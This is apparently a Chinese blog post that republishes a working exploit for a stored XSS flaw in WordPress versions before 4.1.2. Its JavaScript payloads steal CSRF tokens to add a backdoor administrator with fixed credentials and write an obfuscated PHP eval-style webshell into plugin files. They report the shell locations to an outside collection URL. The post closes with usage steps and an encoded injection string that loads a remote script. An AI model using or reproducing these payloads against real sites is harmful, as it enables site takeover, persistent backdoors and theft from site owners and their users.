Wordpress < 4.1.2 存储型XSS EXP

ph发了一个wp的xss的poc,然有人问我要exp..

其实Jin神早就在zone里发过了,这里直接稍微改改引用就能成功执行添加管理员或getshell

代码如下:(转载请注明原创0x_Jin)


1.添加管理员

var a = location.href.split('/');
var xurl = location.href.replace(a[a.length-1],"user-new.php");
jQuery.ajax({
  url: xurl,
  type: 'GET',
  dataType: 'html',
  data: {},
})
.done(function(data) {
  var temp = jQuery(data);
  var Xtoken = "";
  temp.find('input#_wpnonce_create-user').each(function(i,o){
    var o=jQuery(o);
    Xtoken=o.attr('value');
  });
  jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'0x_Jin','email':'root@xss1.com','first_name':'0x_Jin','last_name':'0x_Jin','url':'www.xss1.com','pass1':'fuckxssQ','pass2':'fuckxssQ','role':'administrator','createuser':'Add+New+User+'}
  })
  .done(function(){
    console.log('ok');
    return;
  })
})
.fail(function() {
  console.log("error");
})
.always(function() {
  return;
});


2.getshell

/*
0x_Jin WordPress Getshell
*/
function SenData(data){
    jQuery.ajax({
        url: 'http://www.test.com/post.php',
        type: 'POST',
        data:{"Data":data}
    })
}
var a = location.href.split('/');
var file = "";
var xurl = location.href.replace(a[a.length-1],"plugin-editor.php");
var file2 = [];
var StartGetshell = 0;
var shellcode = '<?php\n$k="ass"."ert"; $k(${"_PO"."ST"} ["fuckxssQ"]);';
jQuery.ajax({
  url: xurl,
  type: 'GET',
  dataType: 'html',
  data: {},
})
.done(function(data) {
  var temp = jQuery(data);
  var Xtoken = "";
  var Tmpcode = "";
  temp.find('input#_wpnonce').each(function(i,o){
    var o=jQuery(o);
    Xtoken=o.attr('value');
  });
  temp.find('textarea#newcontent').each(function(i,o){
    var o=jQuery(o);
    Tmpcode = o.text().replace('<?php',shellcode);    
  })
  temp.find('div.alignleft big strong').each(function(i,o){
    var o=jQuery(o);
    file = o.text();
  })
  temp.find('select#plugin option').each(function(i,o){
    var o=jQuery(o);
    file2.push(o.attr('value'));
  })
  if(Xtoken&&Tmpcode&&file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
    })
    .done(function(){
      var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
      console.info('Webshell:'+location.href.replace(temp,"wp-content/plugins/"+file));
      return;
    })  
  }
  if(StartGetshell){
    for(var i=0;i<file2.length;i++){
      var filename = file2[i];
      if(file2[i]!=file){
        jQuery.ajax({
          url: xurl,
          type: 'POST',
          data: {'plugin': file2[i],'Submit':'Select'},
        })
        .done(function(data) {
          var NewCode = "";
          var NewToken= "";
          var Getshell=jQuery(data);
          Getshell.find("textarea#newcontent").each(function(i,o){
            var o=jQuery(o);
            NewCode = o.text().replace('<?php',shellcode);    
          })
          Getshell.find("input#_wpnonce").each(function(i,o){
            var o=jQuery(o);
            NewToken = o.attr('value');
          })
          if(NewCode&&NewToken){
            console.log("1"+filename);
            jQuery.ajax({
            url: xurl,
            type: 'POST',
            data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
            })
            .done(function(){
              var temp = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
              SenData('Webshell:'+location.href.replace(temp,"wp-content/plugins/"+filename));
              return;
            })  
          }
        })      
      }
    }
  }
})
.fail(function() {
  SenData("error");
})
.always(function() {
  return;
});



使用方法:将代码复制并且保存为xxx.js然后上传到任意服务器、空间,然后使用ph牛发出来的语句测试.

test <abbr title="qweqw style=display:block;position:fixed;width:100%;height:100%;top:0; onmouseover=s=createElement(String.fromCharCode(115,99,114,105,112,116));body.appendChild(s); s.src=String.fromCharCode(你编码后的地址)// "截断字符">


PS:由于此跨站字符会产生截断...请去ph牛的博客复制吧。http://www.leavesongs.com/HTML/wordpress-4-1-stored-xss.html

- -!!(文章果然差点白写了..懒得处理了。)

PS:使用getshell请将接收地址换成自己的,在代码第6行修改

PS:添加的管理员,帐号密码是:0x_Jin:fuckxssQ

(成功就去感谢他吧,失败别来找我..我只是搬运工)

发表评论